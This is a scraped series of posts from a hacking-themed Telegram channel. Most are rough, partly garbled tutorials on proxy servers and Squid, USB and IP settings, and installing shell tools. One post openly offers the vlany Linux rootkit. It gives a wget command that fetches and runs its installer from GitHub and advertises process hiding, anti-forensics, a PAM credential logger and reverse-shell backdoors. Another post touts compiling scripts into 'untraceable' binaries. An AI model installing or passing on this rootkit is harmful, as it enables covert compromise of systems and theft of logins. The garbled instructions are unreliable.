UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.3K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ What is a proxy server
twitter.com/UndercOdeTC

in the TCP / IP network, the traditional communication process is this:

1) the client requests data to the server, the server response Data should be transmitted to the client upon request.

2) After the introduction of the proxy server, the process becomes like this: the client initiates a request to the server, and the request is sent to the proxy server; the proxy server analyzes the request, and first checks whether there is request data in its cache, and directly Transfer to the client, if not, make a request to the server on behalf of the client.

3) After the server responds, the proxy server transmits the response data to the client, while keeping a copy of the data in its own cache. In this way, when another client requests the same data, the proxy server can directly transmit the data to the client without having to initiate a request to the server.

written by UndercOde
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Features Of Proxy Server :
instagram.com/UndercOdeTestingCompany

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

> Generally speaking, the proxy server has the following features:

1) increase access speed by caching

> With the rapid development of Internet, network bandwidth is becoming increasingly rare. Therefore, in order to improve the access speed, many ISPs provide proxy servers, which use the cache function of the proxy server to speed up the network access speed. Generally speaking, most proxy servers support HTTP caching, but some proxy servers also support FTP caching. When choosing a proxy server, for most organizations, only HTTP caching is sufficient.
Generally, caches are classified as active caches and passive caches. The so-called passive cache means that the proxy server caches the data returned by the server only when the client requests data. If the data expires and the client requests the same data, the proxy server must re-initiate a new data request. When the response data is transmitted to the client, a new cache is performed. The so-called active cache means that the proxy server continuously checks the data in the cache. Once the data expires, the proxy server actively initiates a new data request to update the data. In this way, when a client requests the data, the response time is greatly reduced. It should also be noted that most proxy servers do not cache the authentication information in the data.

2) Provide a method for accessing the Internet with a private IP.
IP addresses are valuable resources that are not renewable. If you have only limited IP addresses but need to provide Internet access for the entire organization, then you can achieve this by using a proxy server.

3) To improve network security
This is very clear, if all internal users to access the Internet through a proxy server, then the proxy server will become the only channel into the Internet; conversely, the proxy server is the only Internet access to internal network Channel, if you do not do reverse proxy, for the host on the Internet, only the proxy server of your entire intranet is visible, which greatly enhances the security of the network.

written by UndercOde
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Classification and characteristics of the proxy server :
fb.com/UndercOdeTestingCompany

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

> is usually a proxy server classification is divided into circuit layer proxy application layer proxy, intelligent circuit layer proxy, etc. from the mechanism of implementation. Here, I want to start from another angle and divide proxy servers into traditional proxy servers and transparent proxy servers.

1) the biggest gain from reading this article is that I have a clear understanding of the implementation methods of intranet access to the extranet and extranet access to the intranet.

> the so-called intranet here refers to the internal network using private IP.

2) Our examples are based on the following assumptions:
your domain name is sample.com, and your intranet (192.168.1. *) Users pass proxy.sample.com (external interface eth0: 1.2.3.4; internal interface eth1: 192.168.1.1 )

3) The proxy server accesses the Internet. In other words, the proxy server is the only machine directly connected to the Internet and the intranet. It is assumed that some proxy server software (such as squid) is running on the proxy server. Assume that a client in the intranet is client.sample.com (192.168.1.100).

+ ------------------- +
| Intranet (192.168.1. *) | Eth1 + -------- + eth0 DDN
| + ---- -------- | proxy | <================> Internet
| client198.168.1.100 | + -------- +
+ --- + ----------------

eth0: 1.2.3.4
eth1: 198.168.1.1

written by UndercOde
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ ▂▁

πŸ¦‘traditional agency example Configuration and application of proxy server
pinterest.com/UndercodeOfficial

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

πŸ¦‘ based on the above we do the following:

1) The proxy service software is bound to port 8080 of the proxy server.

2) The client browser is configured to use port 8080 of the proxy server.

3) The client does not need to configure DNS.

4) A proxy server needs to be configured on the proxy server.

5) The client does not need to configure a default route.

πŸ¦‘ When we open a web request in the client browser, such as " http://www.yourdomain.com ", the following events will occur successively:

1) The client uses a certain port (such as 1025) to connect to the proxy server 8080 Port, request the web page " http://www.yourdomain.com "

2) The proxy server requests "www.yourdomain.com" from the DNS to get the corresponding IP address 202.99.11.120. Then, the proxy server uses a certain port (such as 1037) to initiate a web connection request to port 80 of the IP address, requesting a web page.

3) After receiving the response web page, the proxy server transmits the data to the client.

4) The client browser displays the page.

From the perspective of www.yourdomain.com, the connection is established between port 1037 at 1.2.3.4 and port 80 at 202.99.11.120. From the client's perspective, the connection is established between port 1025 at 192.168.1.100 and port 8080 at 1.2.3.4.

written by UndercOde
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ ▂▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Transparent Proxy :
twitter.com/UndercOdeTC


Transparent proxy means that clients do not need to know the existence of the proxy server.
Based on the above we do the following:

1) Configure the transparent proxy server software to run on port 8080 of the proxy server.

2) Configure the proxy server to redirect all connections to port 80 to port 8080.

3) Configure the client browser to connect directly to the Internet.

4) Configure DNS on the client.

5) Configure the client's default gateway to 192.168.1.1.

> When we open a web request in the client browser, such as " http://www.yourdomain.com ", at this time The following events will occur one after another:

1) The client requests "www.yourdomain.com" from DNS and obtains the corresponding IP address 202.99.11.120. Then, the client uses a certain port (such as 1066) to initiate a web connection request to port 80 of the IP address, requesting a web page.

2) When the request packet passes through the transparent proxy server, it is redirected to the bound port 8080 of the proxy server. Therefore, the transparent proxy server uses a certain port (such as 1088) to initiate a web connection request to port 80 of 202.99.11.120 to request a web page.

3) After receiving the response web page, the proxy server transmits the data to the client.

4) The client browser displays the page.

From the perspective of www.yourdomain.com, the connection is established between port 1088 at port 1.2.3.4 and port 80 at 202.99.11.120. From the client's perspective, the connection is established between port 1066 at 192.168.1.100 and port 80 at 202.99.11.120.

πŸ¦‘ The above is the difference between a traditional proxy server and a transparent proxy server.

Comparison of various proxy servers
There are many proxy server software under linux. I checked it from www.freshmeat.com (a famous linux software site), and there are more than sixty. However, only Apache, socks, squid, etc., which have been widely used, have proven to be high-performance proxy software

@ Steaven
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ ▂▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ More About Proxie Work Like Expert :
instagram.com/UndercOdeTestingCompany


As can be seen from the above comparison, Apache web server main function is, the proxy function is only one of its modules only, Socks powerful, but inflexible, so we recommend that you focus on the use Squid. In the following chapters, we will learn about Squid's exciting features and related installation and configuration.

πŸ¦‘ Now install Proxy Server Squid

A) acquisition software
you can get the software in the following ways:

1) From the official site of Squid http://www.squid-cache.org download the software;

2) From your linux release Obtain the software;
Generally, there are two types of Squid packages: one is the source code, which needs to be recompiled after downloading; the executable file can be used after decompression after downloading; the other is the rpm package used by RedHat. Below we talk about the installation methods of these two software packages.

B) Installing the software
we present the latest stable version of squid-2.3.STABLEX example.
3.2.1rpm package installation

1) Go to / mnt / cdrom / RedHat / RPMS

2) Run rpm -ivh squid-2.2.STABLE4-8.i386.rpm.
Of course, we can also install the software during the process of

πŸ¦‘ installing the system.

C) Installation of Source Code Package

1) Download squid-2.3.STABLE2-src.tar.gz from http://www.squid-cache.org .

2) Copy the file to the / usr / local directory.

3) Unzip the file tar xvzf squid-2.3.STABLE2-src.tar.gz.

4) After unzipping, generate a new directory squid-2.3.STABLE2 in / usr / local. For convenience, use the mv command to rename the directory squid-2.3.STABLE2 squid;

5)Enter squid cd squid

6) ./configure can be performed ./confgure --prefix = / directory / you / want installation directory specified
default installation directory / usr / local / squid.

7) Execute make all

8) Execute make install

9) After installation, Squid's executable file is in the bin subdirectory of the installation directory, and the configuration file is in the etc subdirectory.

Written by UndercOde
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ ▂▁
πŸ¦‘ AFTER THOSE TUTORIALS YOU ARE ABLE TO KNOW EVERYTHING RELATED TO Configuration and application of proxy server
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ ▂▁

πŸ¦‘ Configuration and applicacommon configuration options
because the default configuration file in question, we must first amend the contents of the configuration file in order to allow squid up and running.
instagram.com/UndercOdeTestingCompany

Let ’s take a look at the structure of the squid.conf file and some commonly used options: The
squid.conf configuration file can be divided into 13 parts, these 13 parts are:

1) NETWORK OPTIONS (relevant network options)

2)OPTIONS WHICH AFFECT THE NEIGHBOR SELECTION ALGORITHM (relevant options for the neighbor selection algorithm)

3) OPTIONS WHICH AFFECT THE CACHE SIZE (relevant options that define the size of the cache)

4) LOGFILE PATHNAMES AND CACHE DIRECTORIES Directory)

5) OPTIONS FOR EXTERNAL SUPPORT PROGRAMS (external support program options)

6) OPTIONS the FOR TUNING THE CACHE (cache adjustment option)

7) TIMEOUTS (timeout)

8) ACCESS CONTROLS (access control)

9) ADMINISTRATIVE the PARAMETERS (management parameters)

10) OPTIONS FOR THE CACHE REGISTRATION SERVICE (cache registration service option)

11) HTTPD-ACCELERATOR OPTIONS (
MISD acceleration option) 12. MISCELLANEOUS (miscellaneous)

12) DELAY POOL PARAMETERS (delay pool parameters)
Although the configuration file of Squid is very large, but You only provide proxy services for a small and medium network, and you are only going to use one server, then you only need to modify a few options in the configuration file.

Written by UndercOde
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ ▂▁
πŸ¦‘ From Under Code Report 2020 All Good Python Official Scripts Termux - Linux are sended Successfully Will send Their New Release Soon..
You can search chats Or Dm @UNDERCodeOfficial To forward, or new undercode posts
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Fix issue want for your disk copy file is too large [breakthrough ideas]
t.me/UnderCodeTesting

Because the computer system handles the problem of too large copy files on u disks, many people will not operate, so this tut. to help you solve the problem of too large files copied on u disks.


So how should you deal with the large files copied on u disks?

> First, insert the USB disk we need to convert the format, and check the drive letter assigned to the USB disk in the computer

> Next, open the start menu, click the run option, and enter the command cmd Then press the Enter key, and then a dos window with a black background will appear on the screen

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) First, insert the USB flash drive we need to convert the format, and check the drive letter assigned to the USB drive in the computer

2) Next, open the start menu, click the run option, enter the command cmd and press the Enter key, and then a dos window

3) Then we enter a string of code like this in the window:

"Convert X: / fs: ntfs" (excluding quotes), where X represents the drive letter currently occupied by the USB drive we need to convert. After the input is completed, press the Enter key to start the USB drive format conversion. As shown below:


4) After the conversion is complete, if we observe the attributes of the USB disk, we will find that the file system format of the USB disk has been successfully converted from fat32 to ntfs

5)now can copy the large file to usb without any error

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Netcom IP address [processing ideas]
for beginers
twitter.com/UndercOdeTC

> Since many people will not operate the problem of Netcom IP address in the computer system
So how should I deal with the Netcom IP address?


1) Click on the small icon of the network link in the lower right corner of the computer and select "Open Network Connection".

2) Select the "Properties" step on the network card you use. Solve the idea of Netcom IP address.

3) Click the small icon of the network link in the lower right corner of the computer and select "Open Network Connection"

4) Select "Properties" on the network card you use.

5) Open the Local Area Connection Properties panel and select "Internet Protocol (TCP / IP)" Double-click

6) Open the "Internet Protocol (TCP / IP)" property panel, the default is to obtain the IP address option automatically

7) To set it manually, select the second option β€œUse the following IP address”. Set the IP address according to the following figure, (the subnet mask is automatically generated), the gateway (generally 192.168.1.1), DNS preferred Server address, you can fill in 4 8 or the DNS address of your local telecommunications or australia Netcom.

8) Finally, check if your IP is set correctly in the console

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘postgresql-
>postgis JDBC code :
simple example-easy and fast
instagram.com/UndrcOdeTestingCompany


Connection c = null;
Statement stmt = null;
try {
Class.forName(β€œorg.postgresql.Driver”);
c = DriverManager.getConnection(β€œjdbc:postgresql://localhost:5432/spatial”, β€œpostgres”, β€œ123456”);
c.setAutoCommit(false);
System.out.println(β€œOpened database successfully”);
stmt = c.createStatement();
String sql = β€œCREATE TABLE STUDENTS ” +
β€œ(ID TEXT PRIMARY KEY NOT NULL ,” +
” NAME TEXT NOT NULL, ” +
” SEX TEXT NOT NULL, ” +
” AGE TEXT NOT NULL)”;
stmt.executeUpdate(sql);
System.out.println(β€œTable created successfully”);

stmt.close();
c.commit();
c.close();
} catch (Exception e) {
System.err.println(e.getClass().getName() + β€œ: ” + e.getMessage());
System.exit(0);
}

@UndercOdeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Rookit virus for kali
Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)
t.me/UNdercOdeTesting

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

> wget https://gist.githubusercontent.com/mempodippy/d93fd99164bace9e63752afb791a896b/raw/6b06d235beac8590f56c47b7f46e2e4fac9cf584/quick_install.sh -O /tmp/quick_install.sh && chmod +x /tmp/quick_install.sh && /tmp/quick_install.sh

2) The quick_install.sh script automatically downloads the latest version of vlany from this repository, untars the archive, then executes the regular installation script from a new random directory in /tmp/. By default, the quick_install.sh script removes the new directory once execution has completely finished.

3) it's very simple to install vlany onto a sytem as it comes with an automated install script.
To install vlany you want to first download it from our GitHub ( Always up to date and trusted )
root@vlany:~# wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar xvpfz master.tar.gz

4) Once it's downloaded you just have to run install.sh inside vlany-master.
root@vlany:~# cd vlany-master && ./install.sh
By default this will prompt you with a tui installation but if cli is prefered you can use the --cli argument to invoke a similar cli installation.
Or Detailed/commands

#!/bin/sh

[ $(id -u) != 0 ] && { echo "Not root. Exiting."; exit; }

WORKING_DIR="/tmp/.$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"
ARCHIVE_NAME="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1).tar.gz"

1) mkdir $WORKING_DIR && cd $WORKING_DIR

2) wget https://github.com/mempodippy/vlany/archive/master.tar.gz -O $ARCHIVE_NAME

3) tar xvpfz $ARCHIVE_NAME && rm $ARCHIVE_NAME

4) cd vlany-master

5) chmod +x install.sh

6) ./install.sh

7) rm -rf $WORKING_DIR

πŸ¦‘ Features :

Process hiding
User hiding
Network hiding
LXC container
Anti-Debug
Anti-Forensics
Persistent (re)installation & Anti-Detection
Dynamic linker modifications
Backdoors
accept() backdoor (derived from Jynx2)
PAM backdoor
PAM auth logger
snodew reverse shell backdoor
vlany-exclusive commands

E N J O Y
@UndercOdeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ LETS SHARE SOME TOPIC SCRIPTS 2020 on git
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ usefull for any programmer, Directory-based Environments for integretion and more... topic 2020

> If a directory contains a .env file, it will automatically be executed when you cd into it. When enabled (set AUTOENV_ENABLE_LEAVE to a non-null string), if a directory contains a .env.leave file, it will automatically be executed when you leave it.
twitter.com/UNdercOdeTC

usefull for :

1) auto-activating virtualenvs

2) auto-deactivating virtualenvs

3) project-specific environment variable

> When executing, autoenv, will walk up the directories until the mount point and execute all .env files beginning at the top.

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

> Mac OS X Using Homebrew

1) brew install autoenv

2) echo "source $(brew --prefix autoenv)/activate.sh" >> ~/.bash_profile

> Using pip

1) pip install autoenv

2) echo "source which activate.sh" >> ~/.bashrc

> Using git

1) git clone git://github.com/inishchith/autoenv.git ~/.autoenv

2) echo 'source ~/.autoenv/activate.sh' >> ~/.bashrc

πŸ¦‘Configuration
Before sourcing activate.sh, you can set the following variables:

1) AUTOENV_AUTH_FILE: Authorized env files, defaults to ~/.autoenv_authorized

2) AUTOENV_ENV_FILENAME: Name of the .env file, defaults to .env

3) AUTOENV_LOWER_FIRST: Set this variable to flip the order of .env files executed

4) AUTOENV_ENV_LEAVE_FILENAME: Name of the .env.leave file, defaults to .env.leave

5) AUTOENV_ENABLE_LEAVE: Set this to a non-null string in order to enable source env when leaving

6) AUTOENV_ASSUME_YES: Set this variable to silently authorize the initialization of new environments

@UndercOdeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Another top 2020 scripts for linux A next-generation cd command with your interactive filter
>The new cd command called "enhancd" enhanced the flexibility and usability for a user. enhancd will memorize all directories visited by a user and use it for the pathname resolution. If the log of enhancd have more than one directory path with the same name, enhancd will pass the candidate directories list to the filter within the ENHANCD_FILTER environment variable in order to narrow it down to one directory
t.me/UndercOdeTesting

πŸ¦‘ FEATURES :

1) Go to the visited directory in the past

2) Easy to filter, using your favorite filter

3) Work on Bash, Zsh and fish (cross-shell compatibility)

4) Go back to a specific parent directory like zsh-bd

5) Fuzzy search in a similar name directory

6) Support standard input (echo $HOME | cd is acceptable)

7) Custom options (user-defined option is acceptable)

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

# add the fzy brew tap to homebrew

1) brew tap jhawthorn/fzy

# install fzy and ccat with homebrew
2) brew install fzy ccat

# alt: brew install fzy ccat percol peco fzf
# depending on which interactive filter you want to use

# install enhancd into your home directory (or a preferred directory)

3) cd ~

4) git clone https://github.com/b4b4r07/enhancd

# if you want to hide the directory in the finder (gui)

5) chflags hidden enhancd

# add enhancd to your bash profile (or sourced file of choice)

6) echo "source ~/enhancd/init.sh" >> ~/.bash_profile

# reload your bash profile

7) source ~/.bash_profile

8) > Fish
enhancd works on fish 3.0.0 and above.

Install one of the interactive filter listed above

Install enhancd-fish :

Oh-my-fish

> omf install https://github.com/b4b4r07/enhancd

9) source ./init.sh

10) The basic usage of the cd command that has been implemented by enhancd is the same as the normal builtin cd command.

$ cd [-|..] <directory>

11) If no arguments are given, enhancd cd command will display a list of the directory you've visited once, encourage you to filter the directory that you want to move.

$ cd
...
/home/lisa/src/github.com/b4b4r07/enhancd/zsh
/home/lisa/src/github.com/b4b4r07/gotcha
/home/lisa/src/github.com/b4b4r07/blog/public
/home/lisa/src/github.com/b4b4r07/blog
/home/lisa/src/github.com/b4b4r07/link_test
/home/lisa/src/github.com/b4b4r07
/home/lisa/Dropbox/etc/dotfiles
/home/lisa/src/github.com/b4b4r07/enhancd
> /home/lisa
247/247
> _

E N J O Y
@UndercOdeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘updated 2020 bash package manager - usefull script :
t.me/UNdercOdeTesting

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

1) placing bpkg and related scripts on /usr/local/bin.

Paste the following on your shell and you're good to go:

$ curl -Lo- "https://raw.githubusercontent.com/bpkg/bpkg/master/setup.sh" | bash

2) clib is a package manager for C projects. If you already have it, installing bpkg is a simple matter of:

$ clib install bpkg/bpkg

3) Source Code
To directly install bpkg from its source code you have to clone its repository and run the setup.sh script:

> git clone https://github.com/bpkg/bpkg.git

> cd bpkg

> ./setup.sh # Will install bpkg in $HOME/.local/bin

> sudo ./setup.sh # Will install bpkg in /usr/local/bin.

> PREFIX=/my/custom/directory ./setup.sh # Will install bpkg in a custom directory.

2) Packages can either be global (on /usr/local/bin if installed as root or
> HOME/.local/bin otherwize) or local (under ./deps).

For example, here's a global install for the current user of the term package:

3) bpkg install term -g

4) term
And the same package as a local install:

5) bpkg install term

6) ./deps/term/term.sh

7) After a local install the term.sh script is copied as term to the deps/bin directory, you can add this directory to the PATH with

> export PATH=$PATH:/path_to_bkpg/deps/bin

8) As a bonus, you can specify a specific version:

$ bpkg install jwerle/suggest.sh@0.0.1 -g

9) You can also install packages without a package.json. As long as there is a Makefile in the repository it will try to invoke make install as long as the -g or --global flags are set when invoking bpkg install.

For example you could install git-standup with an omitted package.json because of the Makefile and the install target found in it.

> $ bpkg install stephenmathieson/git-standup -g

info: Using latest (master)
warn: Package doesn't exist
warn: Missing build script
warn: Trying `make install'...
info: install: `make install'
cp -f git-standup /usr/local/bin

E N J O Y
@UndercOdeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘updated 2020 topic Minimal Linux Live (MLL) is a tiny educational Linux distribution, which is designed to be built from scratch by using a collection of automated shell scripts. Minimal Linux Live offers a core environment with just the Linux kernel, GNU C library, and Busybox userland utilities.
instagram.com/UndercOdeTestingCompany

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

>The generated ISO image file contains Linux kernel, GNU C library compiled with default options, Busybox compiled with default options, quite simple initramfs structure and some "overlay bundles" (the default build process provides few overlay bundles). You don't get Windows support out of the box, nor you get any fancy desktop environment (refer to the Debootstrap Live project if you need minimal system with network and UI). All you get is a simple shell console with default Busybox applets, network support via DHCP and... well, that's all. This is why it's called "minimal".


1) git clone https://github.com/ivandavidov/minimal/

2) go to dir then
>The section below is for Ubuntu and other Debian based distros.

# Resolve build dependencies

3) sudo apt install wget make gawk gcc bc bison flex xorriso libelf-dev libssl-dev

# Build everything and produce ISO image.

4) ./build_minimal_linux_live.sh

5) The default build process uses some custom provided CFLAGS. They can be found in the .config file. Some of these additional flags were introduced in order to fix different issues which were reported during the development phase.

πŸ¦‘ How to build all overlay bundles.

1) cd minimal_overlay

2) ./overlay_build.sh
# How to build specific overlay bundle. The example is for 'Open JDK'
# which depends on many GNU C libraries and on ZLIB. All dependencies
# are handled automatically by the overlay bundle system.

cd minimal_overlay
./overlay_build.sh openjdk

E N J O Y
Posted by UndercOde
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ 2020 top Shell script compiler
twitter.com/UndercOdeTC

> A generic shell script compiler. Shc takes a script, which is specified on the command line and produces C source code. The generated source code is then compiled and linked to produce a stripped binary executable.

> The compiled binary will still be dependent on the shell specified in the first line of the shell code (i.e shebang) (i.e. #!/bin/sh), thus shc does not create completely independent binaries.

> shc itself is not a compiler such as cc, it rather encodes and encrypts a shell script and generates C source code with the added expiration capability. It then uses the system compiler to compile a stripped binary which behaves exactly like the original script. Upon execution, the compiled binary will decrypt and execute the code with the shell -c option.

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

1) git clone https://github.com/neurobin/shc

2) cd shc

3) ./configure

4) make

5) sudo make install

6) If make fails due to automake version, run ./autogen.sh before running the above commands.

πŸ¦‘ Ubuntu-specific

1) sudo add-apt-repository ppa:neurobin/ppa

2) sudo apt-get update

3) sudo apt-get install shc

4) If the above installation method seems like too much work, then just download a compiled binary package from release page and copy the shc binary to /usr/bin and shc.1 file to /usr/share/man/man1.

πŸ¦‘ Usage

1) shc [options]

2) shc -f script.sh -o binary

3) shc -U -f script.sh -o binary # Untraceable binary (prevent strace, ptrace etc..)

4) shc -H -f script.sh -o binary # Untraceable binary, does not require root (only bourne shell (sh) scripts with no parameter)

πŸ¦‘ The hardening flag -H

> This flag is currently in an experimental state and may not work in all systems. This flag only works for default shell. For example, if you compile a bash script with -H flag then the resultant executable will only work in systems where the default shell is bash. You may change the default shell which generally is /bin/sh which further is just a link to another shell like bash or dash etc.

> Also -H does not work with positional parameters (yet)

πŸ¦‘ Testing :

./configure
make
make check
./configure
make
make check

πŸ¦‘ If you want to edit the manual, please edit the man.md file (available in the master branch) instead and then generate the manual file from it with the command (requires pandoc to be installed):


> pandoc -s man.md -t man -o shc.1
#also run this command to generate the html manual

> pandoc -s man.md -t html -o man.html

E N J O Y
Written by UndercOde
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁